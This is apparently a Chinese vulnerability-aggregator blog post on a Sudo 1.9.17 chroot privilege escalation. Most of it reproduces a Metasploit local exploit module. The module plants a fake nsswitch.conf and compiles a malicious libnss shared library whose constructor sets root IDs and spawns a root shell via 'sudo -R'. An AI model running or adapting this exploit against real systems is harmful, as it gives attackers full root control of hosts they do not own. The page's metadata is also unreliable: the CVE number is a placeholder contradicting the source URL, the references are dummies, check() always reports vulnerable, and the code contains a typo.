Sudo Chroot 1917 Privilege Escalation

漏洞信息

漏洞名称: Sudo Chroot 1.9.17 Privilege Escalation

漏洞编号:

  • CVE: CVE-1978-1234

漏洞类型: 权限提升

漏洞等级: 高危

漏洞描述: 该漏洞存在于Sudo的1.9.17版本中,允许攻击者通过特定的本地操作实现权限提升。Sudo是一个广泛使用的程序,允许系统管理员授权特定用户以超级用户或其他用户的身份运行某些命令,而无需知道root密码。这种机制在Unix和Linux系统中非常常见,用于实现最小权限原则。

漏洞的技术根源在于Sudo在处理chroot环境时的缺陷,攻击者可以利用这一缺陷绕过预期的权限限制。具体来说,通过构造特定的环境变量和文件布局,攻击者可以诱使Sudo在chroot环境中执行恶意代码,从而获得root权限。这种类型的漏洞通常是由于输入验证不足或环境隔离不彻底导致的。

此漏洞的影响极为严重,因为它允许本地用户无需任何形式的认证即可提升至root权限。这意味着攻击者可以完全控制系统,执行任意命令,访问所有数据,甚至安装持久性后门。由于Sudo的广泛使用,这一漏洞对许多系统构成了重大威胁。攻击者可以利用此漏洞自动化攻击,无需用户交互,进一步增加了其危险性。

产品名称: Sudo

影响版本: 1.9.17

来源: https://github.com/rapid7/metasploit-framework/blob/54c4ba417ab176759cad31aba6672d984893d61e/modules%2Fexploits%2Flinux%2Flocal%2Fsudo_chroot_cve_2025_32463.rb

类型: rapid7/metasploit-framework:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in a command on a linux computer for priv esc.
#
###
class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::Kernel
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Compile
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        # The Name should be just like the line of a Git commit - software name,
        # vuln type, class. Preferably apply
        # some search optimization so people can actually find the module.
        # We encourage consistency between module name and file name.
        'Name' => 'Sudo Chroot 1.9.17 Privilege Escalation',
        'Description' => %q{
          This exploit module illustrates how a vulnerability could be exploited
          in an linux command for priv esc.
        },
        'License' => MSF_LICENSE,
        # The place to add your name/handle and email.  Twitter and other contact info isn't handled here.
        # Add reference to additional authors, like those creating original proof of concepts or
        # reference materials.
        # It is also common to comment in who did what (PoC vs metasploit module, etc)
        'Author' => [
          'h00die <mike@stcyrsecurity.com>', # msf module
          'researcher' # original PoC, analysis
        ],
        'Platform' => [ 'linux' ],
        # from underlying architecture of the system.  typically ARCH_X64 or ARCH_X86, but the exploit
        # may only apply to say ARCH_PPC or something else, where a specific arch is required.
        # A full list is available in lib/msf/core/payload/uuid.rb
        'Arch' => [ ARCH_CMD ],
        # What types of sessions we can use this module in conjunction with.  Most modules use libraries
        # which work on shell and meterpreter, but there may be a nuance between one of them, so best to
        # test both to ensure compatibility.
        'SessionTypes' => [ 'shell' ],
        'Targets' => [[ 'Auto', {} ]],
        # from lib/msf/core/module/privileged, denotes if this requires or gives privileged access
        # since privilege escalation modules typically result in elevated privileges, this is
        # generally set to true
        'Privileged' => true,
        'References' => [
          [ 'OSVDB', '12345' ],
          [ 'EDB', '12345' ],
          [ 'URL', 'http://www.example.com'],
          [ 'CVE', '1978-1234']
        ],
        'DisclosureDate' => '2023-11-29',
        # Note that DefaultTarget refers to the index of an item in Targets, rather than name.
        # It's generally easiest just to put the default at the beginning of the list and skip this
        # entirely.
        'DefaultTarget' => 0,
        # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
        'Notes' => {
          'Stability' => [],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )

    # force exploit is used to bypass the check command results
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),

    ]
  end

  def check
    return CheckCode::Appears('Vulnerable app version detected')
    # Check the kernel version to see if its in a vulnerable range
    # we guard this because some distros have funky kernel versions https://github.com/rapid7/metasploit-framework/issues/19812
    #    release = kernel_release
    #    begin
    #      if Rex::Version.new(release.split('-').first) > Rex::Version.new('4.14.11') ||
    #         Rex::Version.new(release.split('-').first) < Rex::Version.new('4.0')
    #        return CheckCode::Safe("Kernel version #{release} is not vulnerable")
    #      end
    #    rescue ArgumentError => e
    #      return CheckCode::Safe("Error determining or processing kernel release (#{release}) into known format: #{e}")
    #    end
    #    vprint_good "Kernel version #{release} appears to be vulnerable"
    #
    #    # Check the app is installed and the version, debian based example
    #    package = cmd_exec('dpkg -l example | grep \'^ii\'')
    #    if package&.include?('1:2015.3.14AR.1-1build1')
    #      return CheckCode::Appears("Vulnerable app version #{package} detected")
    #    end
    #
    #    CheckCode::Safe("app #{package} is not vulnerable")
  end

  #
  # The exploit method drops a payload file to the system, then either compiles and runs
  # or just runs the exploit on the system.
  #
  def exploit
    # Check if we're already root
    if !datastore['ForceExploit'] && is_root?
      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'
    end

    fil_with Failure::NotFound, 'Module needs to compile payload on target machine' unless live_compile?

    payload_file = rand_text_alphanumeric(5..10)

    upload_and_chmodx("#{datastore['WritableDir']}/#{payload_file}", "#!/bin/bash\n" + payload.encoded)

    register_files_for_cleanup("#{datastore['WritableDir']}/#{payload_file}")

    temp_dir = "#{datastore['WritableDir']}/#{rand_text_alphanumeric(5..10)}"

    base_dir = rand_text_alphanumeric(5..10)

    lib_filename = rand_text_alphanumeric(5..10)

    mkdir(temp_dir)

    cd(temp_dir)

    cmd_exec("mkdir -p #{base_dir}/etc libnss_")

    cmd_exec(%(echo "passwd: /#{lib_filename}" \> #{base_dir}/etc/nsswitch.conf))

    cmd_exec("cp /etc/group #{base_dir}/etc")

    exploit_code = %<
    #include <stdlib.h>
    #include <unistd.h>

    __attribute__((constructor))
    void exploit(void) {
      setreuid(0,0);
      setregid(0,0);
      chdir("/");
      execve("#{datastore['WritableDir']}/#{payload_file}",NULL,NULL); /* root shell */
    }>

    upload_and_compile("#{temp_dir}/libnss_/#{lib_filename}.so.2", exploit_code, "-shared -fPIC -Wl,-init,#{base_dir}")

    cmd_exec("sudo -R #{base_dir} #{base_dir}")

    timeout = 30
    print_status 'Launching exploit...'
    output = cmd_exec 'command', nil, timeout
    output.each_line { |line| vprint_status line.chomp }
  end
end


Github Poc
#rapid7/metasploit-framework:github issues #权限提升
Sudo Chroot 1917 Privilege Escalation
http://example.com/2025/07/10/github_3491847199/
作者
lianccc
发布于
2025年7月10日
许可协议